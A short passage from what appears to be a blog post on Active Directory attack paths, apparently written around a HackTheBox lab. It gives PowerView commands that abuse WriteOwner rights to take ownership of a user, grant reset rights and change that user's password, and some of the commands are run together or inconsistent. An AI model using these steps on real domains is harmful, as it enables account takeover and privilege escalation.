Active Directory Attack paths(with exploitation)(will be updated as I learn more):

n00πŸ”‘
13 min readJan 7, 2021
  1. Abusing WriteOwner rights:
tom(left) has WriteOwner rights to claire(middle)

a) Change owner of claire to ourselves(tom)

Set-DomainObjectOwner -Identity claire -OwnerIdentity tom Set-DomainObjectOwner -Identity <target-user> -OwnerIdentity <current-user>

b) Get Reset Password permission.

Add-DomainObjectAcl -TargetIdentity htb\claire -PrincipalIdentity htb\claire -Rights ResetPasswordAdd-DomainObjectAcl -TargetIdentity <target-user> -PrincipalIdentity <target-user> -Rights ResetPassword
Changing ownership

c) Change Password.

Set-DomainObjectOwner -Identity claire -OwnerIdentity tom -verbose
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -verbose
$newpass = ConvertTo-SecureString -String 'P@$$w0rd!1234' -AsPlainText -Force
Set-DomainUserPassword -Identity claire -AccountPassword $newpass -verbose
Changed the password

2. DCSync…

--

--